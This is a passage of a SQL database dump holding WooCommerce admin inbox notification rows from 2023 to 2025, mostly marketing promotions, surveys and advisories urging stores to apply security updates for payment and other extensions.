08:23:09',NULL,0,'plain','',0,0,'info'),(120,'ipp_refresh_q2_2023_us_inbox_notification','marketing','en_US','Grow on the go with in-person payments','Sell your products or services on the go with the M2 card reader – a quick, synchronized, and secure way to take payments, no matter where you are. Create an order using the WooCommerce mobile app and connect your card reader to accept payments.','{}','pending','woocommerce.com','2023-05-18 08:05:53',NULL,0,'plain','',0,0,'info'),(121,'ipp_refresh_q2_2023_ca_inbox_notification','marketing','en_US','Grow on the go with in-person payments','Sell your products or services on the go with the WisePad 3 card reader – a quick, synchronized, and secure way to take payments, no matter where you are. Create an order using the WooCommerce mobile app and connect your card reader to accept payments.','{}','pending','woocommerce.com','2023-05-18 08:05:53',NULL,0,'plain','',0,0,'info'),(122,'product_management_card_sorting','survey','en_US','How do you create and edit products?','Have a say in the future of WooCommerce. Take part in a brief exercise and help us understand what information is important to you while editing products.','{}','pending','woocommerce.com','2023-05-19 11:38:13',NULL,0,'plain','',0,0,'info'),(123,'woocommerce-WCstripe-May-2023-updated-needed','update','en_US','Action required: Security update of WooCommerce Stripe plugin','<strong>Your store requires a security update for the WooCommerce Stripe plugin</strong>. Please update the WooCommerce Stripe plugin immediately to address a potential vulnerability.','{}','pending','woocommerce.com','2023-06-02 08:18:30',NULL,0,'plain','',0,0,'info'),(124,'woocommerce-WCReturnsWarranty-June-2023-updated-needed','update','en_US','Action required: Security update of WooCommerce Returns and Warranty Requests extension','<strong>Your store requires a security update for the Returns and Warranty Requests extension</strong>.  Please update to the latest version of the WooCommerce Returns and Warranty Requests extension immediately to address a potential vulnerability discovered on May 31.','{}','pending','woocommerce.com','2023-06-03 08:04:58',NULL,0,'plain','',0,0,'info'),(125,'woocommerce-WCSubscriptions-June-2023-updated-needed','marketing','en_US','Action required: Security update of WooCommerce Subscriptions','<strong>Your store requires a security update for the WooCommerce Subscriptions plugin</strong>. Please update the WooCommerce Subscriptions plugin immediately to address a potential vulnerability.','{}','pending','woocommerce.com','2023-06-06 07:55:40',NULL,0,'plain','',0,0,'info'),(126,'woocommerce-WCPayments-June-2023-updated-needed','update','en_US','Action required: Security update of WooCommerce Payments','<strong>Your store requires a security update for the WooCommerce Payments plugin</strong>. Please update the WooCommerce Payments plugin immediately to address a potential vulnerability.','{}','pending','woocommerce.com','2023-06-07 07:45:24',NULL,0,'plain','',0,0,'info'),(127,'woocommerce_hpos_1st_notification_q2_2023','marketing','en_US','High-Performance Order Storage (HPOS) is on its way','Our team is targeting August 2023 to roll out a major database upgrade that can unlock faster checkout and order creation for your customers — and lightning-quick order lookup for you. Enablement is optional and you won’t be forced to update, but read on to see why this was our most requested new feature.','{}','unactioned','woocommerce.com','2023-06-07 07:45:24',NULL,0,'plain','',0,0,'info'),(128,'woocommerce-WCOPC-June-2023-updated-needed','update','en_US','Action required: Security update of WooCommerce One Page Checkout','<strong>Your shop requires a security update to address a vulnerability in the WooCommerce One Page Checkout extension</strong>. The fix for this vulnerability was released for this extension on June 13th. Please update immediately.','{}','pending','woocommerce.com','2023-06-21 14:58:17',NULL,0,'plain','',0,0,'info'),(129,'wc-admin-wcpay-bulgaria-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Bulgaria!','We’ve recently released WooCommerce Payments in Bulgaria. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-06-30 07:50:51',NULL,0,'plain','',0,0,'info'),(130,'wc-admin-wcpay-czechia-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Czechia!','We’ve recently released WooCommerce Payments in Czechia. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-06-30 07:50:51',NULL,0,'plain','',0,0,'info'),(131,'wc-admin-wcpay-croatia-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Croatia!','We’ve recently released WooCommerce Payments in Croatia. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-06-30 07:50:51',NULL,0,'plain','',0,0,'info'),(132,'wc-admin-wcpay-hungary-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Hungary!','We’ve recently released WooCommerce Payments in Hungary. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-06-30 07:50:51',NULL,0,'plain','',0,0,'info'),(133,'wc-admin-wcpay-romania-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Romania!','We’ve recently released WooCommerce Payments in Romania. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-06-30 07:50:51',NULL,0,'plain','',0,0,'info'),(134,'wc-admin-wcpay-sweden-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Sweden!','We’ve recently released WooCommerce Payments in Sweden. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-06-30 07:50:51',NULL,0,'plain','',0,0,'info'),(135,'tiktok-spc_june-2023','marketing','en_US','Take the guesswork out of TikTok advertising','Save time and create smarter ads using new automated campaign management from TikTok for WooCommerce. Simplify your campaign creation and watch TikTok’s machine learning build, target, and optimize ads that support your advertising goals — and grow your audience.','{}','unactioned','woocommerce.com','2023-06-30 07:50:51',NULL,0,'plain','',0,0,'info'),(136,'woocommerce-WCGC-July-2023-update-needed','update','en_US','Action required: Security update of WooCommerce GoCardless Extension','<strong>Your shop requires a security update to address a vulnerability in the WooCommerce GoCardless extension</strong>. The fix for this vulnerability was released on July 4th. Please update immediately.','{}','pending','woocommerce.com','2023-07-05 07:54:11',NULL,0,'plain','',0,0,'info'),(137,'woocommerce-shipping-fedex-api-outage-2023-07-16','warning','en_US','Scheduled FedEx API outage — July 2023','On July 16 there will be a full outage of the FedEx API from 04:00 to 08:00 AM UTC. Due to planned maintenance by FedEx, you\'ll be unable to provide FedEx shipping rates during this time. Follow the link below for more information and recommendations on how to minimize impact.','{}','pending','woocommerce.com','2023-07-06 07:48:16',NULL,0,'plain','',0,0,'info'),(138,'wcship-2023-07-hazmat-update-needed','update','en_US','Action required: USPS HAZMAT compliance update for WooCommerce Shipping & Tax extension','<strong>Your store requires an update for the WooCommerce Shipping extension</strong>. Please update to the latest version of the WooCommerce Shipping &amp; Tax extension immediately to ensure compliance with new USPS HAZMAT rules currently in effect.','{}','pending','woocommerce.com','2023-07-12 07:47:31',NULL,0,'plain','',0,0,'info'),(139,'square_payments_q3_2023','marketing','en_US','Square for WooCommerce','Connect your Square account with WooCommerce to accept online and in-person payments (including contactless payments and cross-channel gift cards) quickly and securely. Save time by syncing sales, customers, and items and inventory — and manage everything through one centralized platform.','{}','pending','woocommerce.com','2023-07-20 08:44:17',NULL,0,'plain','',0,0,'info'),(140,'wc-admin-woopayments-rebrand','marketing','en_US','WooCommerce Payments is now WooPayments','We’ve changed the name as part of recent updates to the Woo brand. You’ll still enjoy the same seamless payments experience — just look for WooPayments in your WordPress admin.','{}','pending','woocommerce.com','2023-07-29 07:45:52',NULL,0,'plain','',0,0,'info'),(141,'woocommerce-WCStripe-Aug-2023-update-needed','update','en_US','Action required: Security update for WooCommerce Stripe plugin','<strong>Your shop requires an important security update for the  WooCommerce Stripe plugin</strong>. The fix for this vulnerability was released on July 31. Please update immediately.','{}','pending','woocommerce.com','2023-08-03 07:46:09',NULL,0,'plain','',0,0,'info'),(142,'woocommerce-WCStripe-Aug-2023-security-updated','update','en_US','Security update of WooCommerce Stripe plugin','<strong>Your store has been updated to the latest secure version of the WooCommerce Stripe plugin</strong>. This update was released on July 31.','{}','pending','woocommerce.com','2023-08-03 07:46:09',NULL,0,'plain','',0,0,'info'),(143,'woocommerce-WooPayments-Aug-2023-update-needed','update','en_US','Action required: Security update for WooPayments (WooCommerce Payments) plugin','<strong>Your shop requires an important security update for the WooPayments (WooCommerce Payments) extension</strong>. The fix for this vulnerability was released on July 31. Please update immediately.','{}','pending','woocommerce.com','2023-08-03 07:46:09',NULL,0,'plain','',0,0,'info'),(144,'woocommerce-WooPayments-Aug-2023-security-updated','update','en_US','Security update of WooPayments (WooCommerce Payments) plugin','<strong>Your store has been updated to the more secure version of WooPayments (WooCommerce Payments)</strong>. This update was released on July 31.','{}','pending','woocommerce.com','2023-08-03 07:46:09',NULL,0,'plain','',0,0,'info'),(145,'tiktok-apac-webinar-2023','marketing','en_US','Unlocking TikTok: Live Webinar August 9','Join us on August 9 for a free online masterclass with our partners at TikTok, tailored to Woo merchants in the APAC region (11 am AEST). You’ll learn how to connect your store to TikTok, unlock expert advertising tools, and reach its one billion active global users — all from the comfort of your own home.','{}','pending','woocommerce.com','2023-08-05 07:49:00',NULL,0,'plain','',0,0,'info'),(146,'avalara_q3-2023_noAvaTax','marketing','en_US','Automatically calculate VAT in real time','Take the effort out of determining tax rates and sell confidently across borders with automated tax management from Avalara AvaTax— including built-in VAT calculation when you sell into or across the EU and UK. Save time and stay compliant when you let Avalara do the heavy lifting.','{}','pending','woocommerce.com','2023-08-09 07:51:07',NULL,0,'plain','',0,0,'info'),(147,'avalara_q3-2023_withAvaTax','marketing','en_US','New in AvaTax: Calculate VAT in real time','Take the effort out of determining tax rates and sell confidently across borders with automated tax management from Avalara AvaTax— including built-in VAT calculation when you sell into or across the EU and UK. Save time and stay compliant when you let Avalara do the heavy lifting.','{}','pending','woocommerce.com','2023-08-09 07:51:07',NULL,0,'plain','',0,0,'info'),(148,'google_uxstudy_recruitment_q3-2023','marketing','en_US','Share your feedback in exchange for $150','Woo has teamed up with Google to collect feedback on advertising products and services available to you. If selected, you’ll receive an incentive equal to $150 USD for a 60-minute interview that can help improve the products you use to advertise. If interested, please take 2 minutes to complete the screening survey.','{}','pending','woocommerce.com','2023-08-10 07:43:21',NULL,0,'plain','',0,0,'info'),(149,'woo-activation-survey-blockers-22AUG23','info','en_US','How can we help you get that first sale?','Your feedback is vital. Please take a minute to share your experience of setting up your new store and whether anything is preventing you from making those first few sales. Together, we can make Woo even better!','{}','pending','woocommerce.com','2023-08-23 07:46:55',NULL,0,'plain','',0,0,'info'),(150,'tiktok_shopGTM_q3-2023_hasTikTok','marketing','en_US','You can now sell your products on TikTok Shop','TikTok is changing the way shoppers find and connect with brands. With TikTok Shop, you can sync your entire catalog from within Woo and sell directly to TikTok users through in-feed videos, livestreams, and your product showcase tab.','{}','pending','woocommerce.com','2023-09-07 07:46:04',NULL,0,'plain','',0,0,'info'),(151,'tiktok_shopGTM_q3-2023_noTikTok','marketing','en_US','You can now sell your products on TikTok Shop','TikTok is changing the way shoppers find and connect with brands. With TikTok Shop, you can sync your entire catalog from within Woo and sell directly to TikTok users through in-feed videos, livestreams, and your product showcase tab.','{}','pending','woocommerce.com','2023-09-08 08:53:53',NULL,0,'plain','',0,0,'info'),(152,'klaviyo_q3_2023','marketing','en_US','Build long lasting relationships with Klaviyo for WooCommerce','Increase customer engagement and boost conversions with powerful email and SMS automation from Klaviyo. Fully integrated with your Woo store, Klaviyo enables you to send personalized communications to your customers — ensuring that the right message is delivered at the right time for maximum impact.','{}','unactioned','woocommerce.com','2023-09-12 07:53:38',NULL,0,'plain','',0,0,'info'),(153,'wc_admin_BNPL_WCPay_Q3_2023','marketing','en_US','Afterpay and Affirm have arrived in WooCommerce Payments!','Give your customers more power with buy now, pay later from Afterpay and Affirm — now included as part of WooCommerce Payments! With this new integration, you can quickly offer a checkout option that converts sales and boosts average order value, all from within the same payments dashboard you already know.','{}','pending','woocommerce.com','2023-09-19 07:47:11',NULL,0,'plain','',0,0,'info'),(154,'wc_admin_afterpay_WCPay_Q3_2023','marketing','en_US','Afterpay has arrived in WooCommerce Payments!','Give your customers more power with buy now, pay later from Afterpay — now included as part of WooCommerce Payments! With this new integration, you can quickly offer a checkout option that converts sales and boosts average order value, all from within the same payments dashboard you already know.','{}','pending','woocommerce.com','2023-09-19 07:47:11',NULL,0,'plain','',0,0,'info'),(155,'woocommerce-usermeta-Sept2023-productvendors','update','en_US','Your store requires a security update','<strong>Your shop needs an update to address a vulnerability in WooCommerce.</strong> The fix was released on Sept 15. Please update WooCommerce to the latest version immediately. <a href=\"https://developer.woocommerce.com/2023/09/16/woocommerce-vulnerability-reintroduced-from-7-0-1/\" />Read our developer update</a> for more information.','{}','pending','woocommerce.com','2023-09-20 07:46:43',NULL,0,'plain','',0,0,'info'),(156,'Klarna_10OCT23','marketing','en_US','Klarna is now available','This is a test. Klarna is now available.','{}','pending','woocommerce.com','2023-10-11 07:59:04',NULL,0,'plain','',0,0,'info'),(157,'wc_com_in_person_payments_card_sale_US_inbox_note_q4_23','marketing','en_US','Save 35% on a WooPayments card reader','Have you been thinking about selling your products or services in person? Now’s the perfect time to do so, as we’re discounting our M2 card readers by 35%! Securely process payments wherever your business takes you, with full store and inventory sync. Don’t miss out — this offer ends October 29, 2023.','{}','pending','woocommerce.com','2023-10-13 08:35:16',NULL,0,'plain','',0,0,'info'),(158,'wc_com_in_person_payments_card_sale_UK_inbox_note_q4_23','marketing','en_US','Save 35% on a WooPayments card reader','Have you been thinking about selling your products or services in person? Now’s the perfect time to do so, as we’re discounting our WisePad 3 card readers by 35%! Securely process payments wherever your business takes you, with full store and inventory sync. Don’t miss out — this offer ends 29th October 2023.','{}','pending','woocommerce.com','2023-10-13 08:35:16',NULL,0,'plain','',0,0,'info'),(159,'wc_com_in_person_payments_card_sale_CA_inbox_note_q4_23','marketing','en_US','Save 35% on a WooPayments card reader','Have you been thinking about selling your products or services in person? Now’s the perfect time to do so, as we’re discounting our WisePad 3 card readers by 35%! Securely process payments wherever your business takes you, with full store and inventory sync. Don’t miss out — this offer ends October 29, 2023.','{}','pending','woocommerce.com','2023-10-13 08:35:16',NULL,0,'plain','',0,0,'info'),(160,'woocommerce-STRIPE-Oct-2023-update-needed','update','en_US','Action required: Security update for WooCommerce Stripe Gateway','<strong>Your shop requires a security update to address a vulnerability in the WooCommerce Stripe Gateway</strong>. The fix for this vulnerability was released on October 17. Please update immediately.','{}','pending','woocommerce.com','2023-10-18 07:44:08',NULL,0,'plain','',0,0,'info'),(161,'wc_admin_WooPay_Q4_2023','marketing','en_US','Convert more sales with our fastest checkout yet','Enable WooPay and offer the only single-click checkout experience built by Woo, for Woo. Give shoppers the power to pay instantly and securely speed through checkout, even if it\'s their first visit. Add it for free with one tap in your WooPayments dashboard.','{}','pending','woocommerce.com','2023-10-28 07:55:14',NULL,0,'plain','',0,0,'info'),(162,'wc_admin_WooPay_Oct30_2023','marketing','en_US','Convert more sales with our fastest checkout yet','Enable WooPay and offer the only single-click checkout experience built by Woo, for Woo. Give shoppers the power to pay instantly and securely speed through checkout, even if it\'s their first visit. Add it for free with one tap in your WooPayments dashboard.','{}','pending','woocommerce.com','2023-11-03 08:02:16',NULL,0,'plain','',0,0,'info'),(163,'paypal_paylater_q4_23','marketing','en_US','Boost your sales this holiday season with PayPal','Set yourself up for success this holiday season by allowing customers to pay the way they prefer. With the latest version of PayPal Payments, you can accept PayPal, Venmo (US), Pay Later*, credit and debit cards, and popular alternative payment methods in one secure solution.','{}','pending','woocommerce.com','2023-11-07 07:45:05',NULL,0,'plain','',0,0,'info'),(164,'tap_to_pay_iphone_q4_2023_no_woopayments','marketing','en_US','Accept in-person contactless payments on your iPhone','Tap to Pay on iPhone and WooPayments is quick, secure, and simple to set up — no extra terminals or card readers are needed. Accept contactless debit and credit cards, Apple Pay, and other NFC digital wallets in person.','{}','pending','woocommerce.com','2023-12-06 07:46:15',NULL,0,'plain','',0,0,'info'),(165,'tap_to_pay_iphone_q4_2023_with_woopayments','marketing','en_US','Accept in-person contactless payments on your iPhone','Tap to Pay on iPhone is quick, secure, and simple to set up in WooPayments — no extra terminals or card readers are needed. Accept contactless debit and credit cards, Apple Pay, and other NFC digital wallets in person in a few short steps!','{}','pending','woocommerce.com','2023-12-06 07:46:15',NULL,0,'plain','',0,0,'info'),(166,'amazon-mcf-reviews-2023-12-07','marketing','en_US','Enjoying Amazon MCF for WooCommerce?','We\'re Never Settle, the developers behind Amazon MCF for WooCommerce, and would be deeply honored to have your review. Reviews help immensely as other users can learn how MCF can solve their needs too! Not happy or need help? Please reach out for support and we’d love to make things right!','{}','pending','woocommerce.com','2023-12-07 08:20:28',NULL,0,'plain','',0,0,'info'),(167,'amazon_pay_reactivate_q1-24','marketing','en_US','Special offer: Activate 0% promo rate for Amazon Pay','For a limited time, Woo merchants who register with Amazon Pay can enjoy a promotional rate of 0% on all transaction fees for 30 days. Valid for businesses based in the United Kingdom. Terms and conditions apply.','{}','pending','woocommerce.com','2024-01-10 07:45:26',NULL,0,'plain','',0,0,'info'),(168,'remove_estimated_deposits_2024','marketing','en_US','Estimated deposits are going away','To provide more accurate deposit information and support the expansion of instant deposits, estimated deposit details will no longer be available in WooPayments. We recommend upgrading to the latest version of WooPayments for more detailed balance status information.','{}','pending','woocommerce.com','2024-01-19 09:02:29',NULL,0,'plain','',0,0,'info'),(169,'custom_order_attribution_inbox_q1_2024','marketing','en_US','NEW: Custom Order Attribution','Order attribution tracking is now available for all Woo stores! See whether an order came from a search ad, video, or email. Make better marketing decisions and watch your products go from “maybe” to “must-have.”','{}','pending','woocommerce.com','2024-02-06 07:44:56',NULL,0,'plain','',0,0,'info'),(170,'wc_admin_UKpricingchange_WCPay_Q1_2024','marketing','en_US','Fee Changes for WooPayments in the EEA and UK','WooPayments fees for transactions between the EEA and UK will change as of 1st March, 2024. Transactions between the UK and EEA are now deemed by card networks to be cross-border, thus international payment fees will be applicable. This also changes base processing fees.','{}','pending','woocommerce.com','2024-03-01 07:43:41',NULL,0,'plain','',0,0,'info'),(171,'airwallex_q1_2024','marketing','en_US','Save big on foreign exchange (FX) fees','Boost your international sales by offering Apple Pay, Google Pay, and 60+ local payment methods with Airwallex. Save time and money by settling payments directly in USD, EUR, HKD, SGD, AUD, and more — without the extra FX fees. Simple, cost-effective, fast.','{}','pending','woocommerce.com','2024-03-01 07:43:41',NULL,0,'plain','',0,0,'info'),(172,'checkout_survey_new_users','survey','en_US','We\'d like your feedback on WooCommerce checkout','Your feedback is essential for us to improve the WooCommerce checkout and increase your conversion rate, turning more visitors into customers. Answer a few questions to help us understand your experience. It shouldn\'t take more than 5 minutes of your time.','{}','pending','woocommerce.com','2024-04-19 10:04:29',NULL,0,'plain','',0,0,'info'),(173,'affirm_q2_2024','marketing','en_US','Boost sales and increase average order value with Affirm!','Affirm’s flexible payment options empower customers to get exactly what they want, while making budget-friendly payments. Remove the price barrier and make it even easier for your customers to upgrade, bundle, and add on — with no late fees and clear payment plans. \r\n\r\n* Subject to eligibility. Terms apply.','{}','pending','woocommerce.com','2024-04-25 08:19:09',NULL,0,'plain','',0,0,'info'),(174,'checkout_survey_new_users_no_orders','survey','en_US','We\'d like your feedback on WooCommerce checkout','Your feedback is essential for us to improve the WooCommerce checkout and increase your conversion rate, turning more visitors into customers. Answer a few questions to help us understand your experience. It shouldn\'t take more than 5 minutes of your time.','{}','pending','woocommerce.com','2024-05-01 10:34:05',NULL,0,'plain','',0,0,'info'),(175,'woocommerce-payfast-may-2024-update-needed','update','en_US','An important update is required for the Payfast Payment Gateway','<strong>Please update to the latest version of the Payfast Payment Gateway for WooCommerce immediately to address a security vulnerability</strong>. This update is required to ensure that your transactions continue to process.','{}','pending','woocommerce.com','2024-05-14 10:22:38',NULL,0,'plain','',0,0,'info'),(176,'mailchimp_q2_2024','marketing','en_US','Level up your marketing to boost sales','Looking for a smart way to kickstart your growth? Mailchimp’s best-in-class email marketing empowers you to create and automate precisely targeted SMS and email campaigns and build long-term relationships with your audience. Enhance your customer experience, track sales, and more by connecting your store to Mailchimp.','{}','pending','woocommerce.com','2024-06-04 07:49:03',NULL,0,'plain','',0,0,'info'),(177,'WC-order-attribution-update-June-2024','update','en_US','An important update is required for WooCommerce','<strong>An important security update for WooCommerce has been released</strong>. It is recommended that you update as quickly as possible.','{}','unactioned','woocommerce.com','2024-06-11 08:01:06',NULL,0,'plain','',0,0,'info'),(178,'checkout_block_update_july_2024','marketing','en_US','UPDATE: The checkout block is getting an upgrade!','We’re improving the checkout block in 2024, starting with WooCommerce 9.0, launching on June 18! The latest release includes streamlined order summary with sticky functionality, better address form layout, and other enhancements to boost conversion.','{}','pending','woocommerce.com','2024-06-18 09:14:46',NULL,0,'plain','',0,0,'info'),(179,'bfcm-survey-jul2024','marketing','en_US','Complete our holiday survey and get a $30 coupon','We want to understand how you prepare your store for Black Friday/Cyber Monday and the holidays.\r\n\r\nComplete our 10-minute survey and get $30 USD off an extension from our official Marketplace. Hurry, the survey closes July 15.','{}','pending','woocommerce.com','2024-07-04 07:45:19',NULL,0,'plain','',0,0,'info'),(180,'stripe_newcheckout_q3_2024','marketing','en_US','Upgrade your Stripe checkout for even more payment options','Boost sales, increase order value, and reach new customers with the new checkout from Stripe. Support 23 payment methods, including buy now, pay later methods like Klarna, Afterpay, and Affirm; Bancontact in Europe and Alipay in Asia; and Link, an accelerated checkout experience that autofills payment information.','{}','pending','woocommerce.com','2024-07-05 07:43:43',NULL,0,'plain','',0,0,'info'),(181,'klaviyo_q4_2024','marketing','en_US','Need a marketing solution to help you sell more?','Over 13,000 brands use Klaviyo to grow faster. You can drive 46x ROI with their personalized email, SMS, forms, and product reviews. Start for free today.','{}','pending','woocommerce.com','2024-08-01 07:57:09',NULL,0,'plain','',0,0,'info'),(182,'wnww-recap-july','marketing','en_US','Powerful updates and upgrades in WooCommerce','Have you seen all the latest from Woo? Check out our recent roundup for a look at the newest features, extensions, and insights making WooCommerce perform better than ever.','{}','pending','woocommerce.com','2024-08-13 07:44:29',NULL,0,'plain','',0,0,'info'),(183,'bfcm2024-landing-page','marketing','en_US','The best way to prepare for holiday success','The upcoming holiday season is the busiest time of the year for many online stores. We want to help you make the most of it with an early gift: our first-ever Black Friday Cyber Monday Trends Report. It\'s full of stats, trends, and recommendations to knock your holiday socks off!','{}','pending','woocommerce.com','2024-09-05 07:44:54',NULL,0,'plain','',0,0,'info'),(184,'stripe_securityupdate_q3_2024','update','en_US','Security update required for your Stripe extension','To continue securely accepting payments, you must update your Stripe extension to at least version 8.6, re-authenticate, and turn on the new checkout experience. Review the documentation for instructions on how to make the necessary changes from your WooCommerce dashboard.','{}','pending','woocommerce.com','2024-09-19 08:46:22',NULL,0,'plain','',0,0,'info'),(185,'paypal_migration_Q3_2024','marketing','en_US','You’re using an outdated version of PayPal','Don\'t miss out on potential sales this holiday season — upgrade your store\'s checkout experience by switching to the all-in-one PayPal Payments extension. Enable customers to pay using Venmo and Pay Later (where available), credit and debit cards, Apple Pay, Google Pay, and country-specific options.','{}','pending','woocommerce.com','2024-10-04 07:56:30',NULL,0,'plain','',0,0,'info'),(186,'mollie_q4_2024','marketing','en_US','Special offer: Zero transaction fees for your first month with Mollie','With seamless checkout, flexible financing, and 30+ local and global payment methods, Mollie is the all-in-one payment solution that enhances the customer experience and helps your business grow. Start your account today and enjoy ZERO transaction fees for the first month. Ts&amp;Cs apply.','{}','pending','woocommerce.com','2024-10-31 09:29:07',NULL,0,'plain','',0,0,'info'),(187,'paypal_migration_Q3_2024_v2','marketing','en_US','You’re using an outdated version of PayPal','Don\'t miss out on potential sales this holiday season — upgrade your store\'s checkout experience by switching to the all-in-one PayPal Payments extension. Enable customers to pay using Venmo and Pay Later (where available), credit and debit cards, Apple Pay, Google Pay, and country-specific options.','{}','pending','woocommerce.com','2024-10-31 09:29:07',NULL,0,'plain','',0,0,'info'),(188,'Renewal_notification_emails_Woosubscriptions_Nov2024','marketing','en_US','WooCommerce Subscriptions just got even better','You can now send automatic email reminders to customers before their subscriptions renew or expire. To enable this for your store, update to the latest version of WooCommerce Subscriptions (don\'t forget to make a backup first) and follow the steps linked below.','{}','pending','woocommerce.com','2024-11-19 07:52:55',NULL,0,'plain','',0,0,'info'),(189,'paypal_promo_Q4_2024','marketing','en_US','Add PayPal to your existing checkout this holiday season','Drive conversion and give customers more confidence to buy when you complement your checkout with PayPal, Venmo, Pay Later, and more. Attract new shoppers and give them a streamlined buying experience with Fastlane, PayPal’s fast and simple guest checkout.','{}','pending','woocommerce.com','2024-11-28 07:59:06',NULL,0,'plain','',0,0,'info'),(190,'sirt-woo-2024-11-xss-admin','update','en_US','An important update is required for WooCommerce','This update addresses a security vulnerability that could allow unauthorized access to administrative privileges on your site. <a href=\"https://developer.woocommerce.com/2024/12/03/woocommerce-9-4-3-and-woocommerce-9-3-4-available-now/\">Learn more</a>.\r\n<br><br>\r\n<strong>Please ensure your site is updated to the latest version to stay secure.</strong>','{}','pending','woocommerce.com','2024-12-04 08:13:17',NULL,0,'plain','',0,0,'info'),(191,'usps-mail-service-to-canada-suspended-dec-2024','update','en_US','Please note: USPS Mail Service to Canada Suspended','The United States Postal Service has temporarily suspended mail service to Canada due to the ongoing Canadian postal workers\' strike. USPS is asking users to refrain from mailing items to Canada at this time.','{}','pending','woocommerce.com','2024-12-05 08:15:42',NULL,0,'plain','',0,0,'info'),(192,'Announce-UPS-WCShipping-Dec2024','marketing','en_US','WooCommerce Shipping now supports select UPS services','Give customers the power and reliability of UPS, directly from your dashboard. Access discounted rates, convenient shipping options, and fast, on-time delivery with UPS on WooCommerce Shipping — and stay tuned for UPS® Ground Saver rates coming in 2025.','{}','pending','woocommerce.com','2024-12-13 08:51:04',NULL,0,'plain','',0,0,'info'),(193,'account-creation-after-checkout-dec2024','marketing','en_US','Offer account creation after checkout','Your customers can now create accounts after they check out on block-based themes. Enable the new “After checkout” block in your account settings and enjoy smoother guest checkout, better conversion, and more repeat business.','{}','pending','woocommerce.com','2024-12-19 07:52:19',NULL,0,'plain','',0,0,'info'),(194,'woocommerce-analytics-order-attribution-promotions-december-2024','marketing','en_US','Discover what drives your sales','Use our powerful <strong>Order Attribution</strong> extension to understand what truly drives your revenue. Track your sales journey, identify your most effective marketing channels, and optimize your sales strategy.','{}','pending','woocommerce.com','2024-12-23 08:04:14',NULL,0,'plain','',0,0,'info'),(195,'affirm_promo_Q1_2025','marketing','en_US','Save up to 50% on merchant fees with Affirm','Kickstart the year with buy now, pay later and get merchant rates as low as 2.9% + 30¢ per transaction for 30 days. Download the extension and complete your application from your WooCommerce dashboard by February 19, 2025 to claim the offer. Terms and conditions apply.','{}','pending','woocommerce.com','2025-01-21 07:59:45',NULL,0,'plain','',0,0,'info'),(196,'new-woo-brand-announcement-feb4-2025','marketing','en_US','Meet the new Woo','WooCommerce has a new look, but underneath, we’re still the same customizable, open-source ecommerce platform you know and love. Plus, we’ve got some major improvements to our platform and product on the way.','{}','unactioned','woocommerce.com','2025-02-05 07:43:47',NULL,0,'plain','',0,0,'info'),(197,'paypal_bnpl_au_promo_Q1_2025','marketing','en_US','Australian shoppers can Pay in 4 with PayPal','Enable Pay in 4 messaging to let Australian customers know that they can pay over time while you get paid up front and in full. Pay in 4 is included in PayPal Payments at no additional cost. Eligible buyers can pay in four interest-free payments for purchases of $30 to $2,000 AUD. Terms apply.','{}','pending','woocommerce.com','2025-02-13 09:13:44',NULL,0,'plain','',0,0,'info'),(198,'stripe_stripetax_q1_2025','marketing','en_US','Say goodbye to your tax woes','Stripe Tax automatically applies the correct sales tax, VAT, or GST, saving time while keeping you compliant. And with simple automatic filing, you can stop stressing at tax time and focus on growing instead.','{}','pending','woocommerce.com','2025-02-19 07:55:02',NULL,0,'plain','',0,0,'info'),(199,'printful_promo_q1_2025','marketing','en_US','New: sell print-on-demand products, risk-free','Expand your product line with Printful, now available in the WooCommerce Marketplace. Sell custom products with no upfront costs or inventory. This trusted supplier prints, packages, and ships for you, so you can focus on growing your store — and your next big idea.','{}','pending','woocommerce.com','2025-02-26 07:45:59',NULL,0,'plain','',0,0,'info'),(200,'paypal-braintree-sdk-depreciation-2025-02-20','update','en_US','Update required for your PayPal Braintree extension','To continue securely accepting payments, you must update your PayPal Braintree extension to version 3.2.4 or newer before June 30, 2025. Your current extension version will not support payment processing after this date due to an SSL certificate update.','{}','pending','woocommerce.com','2025-03-04 07:43:40',NULL,0,'plain','',0,0,'info'),(201,'woo-marketplace-two-year-subscriptions-rin-2025-03-17','marketing','en_US','Save 20% on new two-year subscriptions','We’ve introduced 20% off two-year subscriptions for all products* in the WooCommerce Marketplace. Lock in long-term savings and make sure your store never misses a beat. \r\n\r\n*Some exclusions apply. New purchases only.','{}','pending','woocommerce.com','2025-03-17 08:23:10',NULL,0,'plain','',0,0,'info'),(202,'stripe_orderstatus_bug_q2_2025','update','en_US','Action Required: Update Order Status Manager','Update to the latest Order Status Manager (v1.15.5+) to ensure payments are captured. Your version of WooCommerce Order Status Manager can interfere with order processing for payment gateways (including WooCommerce Stripe Gateway v9.2.0+), which may cause orders to process without capturing payment.','{}','pending','woocommerce.com','2025-04-03 08:06:45',NULL,0,'plain','',0,0,'info'),(203,'viva_wallet_migration_q1_2025','update','en_US','Switch to the new Viva.com Smart Checkout','The Viva Wallet extension is no longer being updated and improved. To get the best Viva.com experience, move to the new Smart Checkout. It’s fast, secure, and fully compatible with the latest WooCommerce features.','{}','pending','woocommerce.com','2025-04-04 08:53:20',NULL,0,'plain','',0,0,'info'),(204,'WooCommerce-Stripe-Gateway-Update-April-2025','update','en_US','Action required: Update WooCommerce Stripe Gateway to v9.4.1','<strong>An important update for WooCommerce Stripe Payment Gateway has been released</strong>. Version 9.4.1 addresses performance issues and payment method visibility problems that occurred in version 9.4.0. Please update as soon as possible for optimal store performance. Please read <a href=\"https://developer.woocommerce.com/2025/04/18/https://developer.woocommerce.com/2025/04/18/developer-advisory-stripe-payment-gateway-9-4-1-release/\" /> this advisory</a> for more information.','{}','pending','woocommerce.com','2025-04-19 